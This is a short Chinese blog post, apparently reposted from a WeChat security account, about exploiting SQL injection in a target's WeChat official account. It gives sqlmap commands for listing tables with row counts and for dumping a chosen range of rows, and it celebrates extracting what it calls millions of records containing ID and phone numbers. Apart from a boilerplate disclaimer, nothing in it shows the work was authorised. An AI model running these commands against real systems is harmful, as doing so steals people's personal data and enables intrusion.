一次攻防记录,通过公众号注入拿下数据库,获取百万级别敏感数据。不过没有顶尖操作,一点关于Sqlmap使用的小技巧。
对某目标的公众号进行测试,哎,单引号一插入发现报错了,我再一插入发现闭合了,我嘞个豆,莫非爽了?
很好,毫无波澜的就出了,而且速度极快。那么,基本上是一点问题都没有了。
接下来梭哈表名,同时对数据量进行统计,加上下面这个参数即可:
python sqlmap.py -r x.txt -p xxx -D xlz --tables --count
接着,我思考了一下,可能是系统前期运行的时候只登记了姓名、性别这些内容,没有记录身份证、手机号等信息。那我们让它从指定的区间获取数据不就ODJBK了吗?
python sqlmap.py -r x.txt -p xxx -D xilizhu -T xlz --dump --start 700000 --stop 700050 没错,让它从第70w条数据开始跑,跑个50条先看看符不符合我们的要求,看跑出来的内容里敏感要素够不够:
原文始发于微信公众号(犀利猪安全):直接拿下 | 通过公众号注入获取百万级多要素敏感信息,当场爽的跳起来
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论